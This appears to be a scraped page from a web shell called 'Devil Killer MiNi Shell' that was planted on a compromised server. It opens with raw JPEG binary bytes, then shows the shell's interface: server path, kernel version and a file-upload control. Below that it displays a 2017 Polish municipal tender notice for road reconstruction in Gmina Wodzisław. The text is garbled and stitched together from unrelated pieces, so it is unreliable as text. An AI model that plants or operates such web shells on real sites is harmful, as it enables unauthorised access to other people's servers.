JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170216/26766-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.wodzislaw.biuletyn.net' target='_blank'>http://www.wodzislaw.biuletyn.net</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 26766 - 2017
              z dnia 2017-02-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wodzisław: Przebudowa dróg na terenie Gminy Wodzisław w 2017 roku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Wodzisław, krajowy numer identyfikacyjny
              29101085000000, ul.
              ul. Krakowska 
              6,
              28330  
              Wodzisław, woj.
              świętokrzyskie, państwo
              Polska, tel.
              413 806 118, e-mail
              ugwodzislaw@wp.pl, faks
              413 806 118.
              <br />
              Adres strony internetowej (URL): www.wodzislaw.biuletyn.net<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.wodzislaw.biuletyn.net</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.wodzislaw.biuletyn.net</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty składa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca, pod rygorem nieważności, w formie pisemnej w oryginale (na podstawie art. 18 pkt 4 ustawy z dnia 22 czerwca 2016r. o zmianie ustawy  Prawo zamówień publicznych oraz niektórych innych ustaw)<br />
                Adres:
                <br />Urząd Gminy w Wodzisławiu ul. Krakowska 6, 28-330 Wodzisław</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa dróg na terenie Gminy Wodzisław w 2017 roku<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest przebudowa dróg na terenie Gminy Wodzisław na następujących odcinkach:
Zadanie 1. Przebudowa drogi wewnętrznej Konary (odcinek 206,5 m w km 0+600 do 0+806,5) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,3 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,0 m + rozjazd i wjazd 30,0m2.
Zadanie 2. Przebudowa drogi gminnej Judasze  Pinechówka  Zarzecze (odcinek 308 m w km 0+900 do 1+208) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,8 m,
-	obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
-	wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,5 m.
Zadanie 3. Przebudowa drogi gminnej Łany przez wieś (odcinek 300 m w km 0+660 do 0+960) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,60 m na powierzchni 40% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie (na odcinku 192 m w km 0+660 do 0+852  gr. 7 cm na szerokości 3,6 m, na odcinku 108 m w km 0+852 do 0+960  gr. 10 cm na szerokości 3,1 m),
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) (na odcinku 192 m w km 0+660 do 0+852  szerokość układania 3,0 m, na odcinku 108 m w km 0+852 do 0+960  szerokość układania 2,5 m).
Zadanie 4. Przebudowa drogi wewnętrznej Lubcza Kolonia Rędziny (odcinek 425 m w km 0+475 do 0+900) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,3 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,0 m + rozjazd 12,0 m2.
Zadanie 5. Przebudowa drogi wewnętrznej Podlesie pod lasem (odcinek 1200 m w km 4+150 do 5+350) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,60 m na powierzchni 30% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie (na odcinku 1033 m w km 4+150 do 5+183  gr. 7 cm na szerokości 3,8 m, na odcinku 167 m w km 5+183 do 5+350  gr. 10 cm na szerokości 3,3 m),
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) (na odcinku 1033 m w km 4+150 do 5+183  szerokość układania 3,5 m, na odcinku 167 m w km 5+183 do 5+350  szerokość układania 3,0 m).
Zadanie 6. Przebudowa drogi gminnej Przezwody  Dropiówka (odcinek 892 m w km 1+150 do 2+042) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,80 m na powierzchni 30% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 7 cm na szerokości 3,8 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,5 m.
Zadanie 7. Przebudowa drogi wewnętrznej Przyrąb  Janów (odcinek 525 m w km 0+000 do 0+525) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,6 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,0 m + rozjazd 12,0 m2.
Zadanie 8. Przebudowa drogi wewnętrznej Krężoły przez wieś (odcinek 295 m w km 0+005 do 0+300) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,10 m na powierzchni 20% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 7 cm na szerokości 3,1 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 2,5 m.
Zadanie 9. Przebudowa drogi wewnętrznej Laskowa  Serwit (odcinek 415 m w km 0+000 do 0+415) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,3 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,0 m + rozjazd 12,0 m2.
Zadanie 10. Przebudowa drogi wewnętrznej Brzeście (odcinek 265 m w km 0+000 do 0+265) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,30 m na powierzchni 30% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,3 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 2,7 m + rozjazd 12,0 m2.
Zadanie 11. Przebudowa drogi wewnętrznej Nowa Olszówka (odcinek 240 m w km 0+000 do 0+240) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,30 m na powierzchni 20% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,3 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 2,7 m + rozjazd 12,0 m2.
Zadanie 12. Przebudowa drogi wewnętrznej Przyłęk (odcinek 125 m w km 0+400 do 0+525) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
-	wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie gr. 10 cm na szerokości 3,8 m,
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) szerokość  układania 3,5 m + rozjazd 50,0 m2.
Zadanie 13. Przebudowa drogi wewnętrznej Klemencice wieś (odcinek 232 m w km 0+000 do 0+232) polegająca na:
­	wytyczeniu trasy drogi w terenie,
­	rozebraniu nawierzchni z mieszanek mineralno-bitumicznych o grubości 4 cm na powierzchni 26,1 m2,
­	rozebraniu przepustu skrzynkowego o wymiarach 50x35x20cm na długości 8,60 m,
­	rozebraniu nawierzchni z płyt betonowych gr. 15 cm, szer. 1,3 m na długości 8,60 m,
­	rozebraniu podbudowy z kruszywa i gruzu asfaltowego o grubości 15 cm na powierzchni 129,5 m2,
­	wywiezieniu gruzu na odległość do 2 km,
­	regulacji pionowej studzienek zaworów wodociągowych  5 szt.,
­	wykonaniu koryta pod jezdnię o głębokości 30 cm na szer. 3,80 m, na długości 37 m, w km 0+049 do 0+086,
­	wykonaniu koryta pod ściek betonowy o głębokości 20 cm, szer. 0,7 m na długości 105,0 m, w km 0+003 do 0+108,
­	wywiezieniu ziemi na odległość do 2 km,
­	profilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne na szerokości 4,10 m, długość 124 m w km 0+108 do 0+232,
­	wykonaniu renowacji rowu przydrożnego na długości 120 m,
­	wykonaniu dolnej warstwy podbudowy z kruszyw naturalnych śr. grubość warstwy po zagęszczeniu 20 cm na szer. 4,10 m w km 0+049 do 0+232,
­	wykonaniu górnej warstwy podbudowy z kruszyw naturalnych śr. grubość warstwy po zagęszczeniu 8 cm na szer. 4,10 m w km 0+000 do 0+232,
­	wykonaniu ścieku z elementów betonowych gr. 15 cm szer. 50 cm na podsypce cementowo-piaskowej na odcinku 105 m,
­	wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych - gr. 4 cm, szerokość układania - 3,5 m na odcinku 232 m w km 0+000 do 0+232 wraz z rozjazdami (12,0 m2),
­	jednostronnym utwardzeniu poboczy kruszywem: wykonanie górnej warstwy podbudowy z kruszywa łamanego 0/31,5 mm, grubość po zagęszczeniu 5 cm, na szer. po 30 cm w km 0+000 do 0+108,
­	obustronnym utwardzeniu poboczy kruszywem: wykonanie górnej warstwy podbudowy z kruszywa łamanego 0/31,5 mm, grubość po zagęszczeniu 5 cm, na szer. po 30 cm w km 0+108 do 0+232.
Zadanie 14. Przebudowa chodnika obok GOSiR (powierzchnia 273 m2) polegająca na:
- oczyszczeniu istniejącej nawierzchni chodnika z płyt betonowych,
- skropienie asfaltem istniejącej nawierzchni chodnika,
-	wyrównanie istniejącej nawierzchni do wymaganego profilu frezowiną asfaltową z zagęszczeniem,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych - gr. 4 cm, szerokość układania - 3,0 m na długości 91,0 m.
Zadanie 15. Przebudowa drogi wewnętrznej Nawarzyce - Niegosławice (odcinek 185 m w km 0+000 do 0+185) polegająca na:
- spryskaniu roztworem chwastobójczym pobocza i nawierzchni drogowej,
- oczyszczeniu istniejącej nawierzchni z ziemi śr. grub. 5 cm, na szer. 3,50 m na powierzchni 30% odcinka,
- obustronnym plantowaniu poboczy do wymaganego spadku z zagęszczeniem,
- wyrównaniu istniejącej podbudowy tłuczniem kamiennym sortowanym, zagęszczanym mechanicznie (na odcinku 65 m w km 0+000 do 0+065  gr. 7 cm na szerokości 3,8 m, na odcinku 120 m w km 0+065 do 0+185  gr. 10 cm na szerokości 3,3 m),
- obustronnym utwardzeniu poboczy kruszywem łamanym 0-31,5 mm na szerokości 0,30 m, gr. 5 cm,
- wykonaniu warstwy ścieralnej z mieszanek mineralno-bitumicznych asfaltowych  standard II (gr. 4 cm) (na odcinku 65 m w km 0+000 do 0+065  szerokość układania 3,5 m, na odcinku 120 m w km 0+065 do 0+185  szerokość układania 3,0 m)
Przedmiot zamówienia obejmuje również:
-	przygotowanie placu budowy wraz z wytyczeniem geodezyjnym obiektów,
-	wykonanie badań zagęszczenia gruntu,
-	oznakowanie budowy (znaki drogowe),
-	wywiezienie i utylizacja gruzu i ziemi,
-	sporządzenie i przedłożenie dokumentacji odbiorowej<br /><br /><b>II.5) Główny kod CPV: </b>45233000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 90<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek ten zostanie uznany za spełniony jeżeli wykonawca:
a)	wykaże, że dysponuje lub będzie dysponował co najmniej następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia: 
- kierownik robót posiadający uprawnienia budowlane do kierowania robotami w specjalności drogowej w ograniczonym zakresie lub bez ograniczeń.
Zamawiający wyraża zgodę na posiadanie uprawnień równoważnych wydanych na podstawie wcześniej obowiązujących przepisów lub przez inne państwa członkowskie Unii Europejskiej<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
